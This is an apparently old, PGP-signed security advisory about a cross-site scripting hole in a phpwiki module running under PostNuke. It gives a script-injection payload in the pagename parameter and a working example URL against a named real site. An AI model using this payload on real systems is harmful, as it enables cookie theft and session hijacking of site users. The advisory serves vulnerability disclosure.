-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
- ----------------------------------------------------
Class : input Validation Error
Risk : Due to the simplicity of the attack and the number of sites
that run phpwiki, the risk is classified as Medium to High.
- ----------------------------------------------------
This wiki is running as a PostNuke module.
- ------------------------------------
Exploit: pagename=|script|alert(document.cookie)|/script|
Change | x <>
Working Example :
http://centre.ics.uci.edu/~grape/modules.php?op=modload&name=Wiki&file=index&pagename=|script|alert(document.cookie)|/script|
- --------------------------------------------------------------------------------------------
programmer of wiki module and admin of postnuke-espanol.org receives a copy
this report.
- --------------------------------------------------------
Salu2
Pistone
- - --------
Http://www.gauchohack.com.ar
Http://www.hackindex.org
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.0.6 (GNU/Linux)
Comment: For info see http://www.gnupg.org
iD8DBQE9NL8cY47Vx76lNPkRAsNDAJ9M5eXRMxL1ASb2TlWaDaveotKAbgCZAQSz
PlAN98+qigqp8S9pkkfFRm4=
=c2FT
-----END PGP SIGNATURE-----
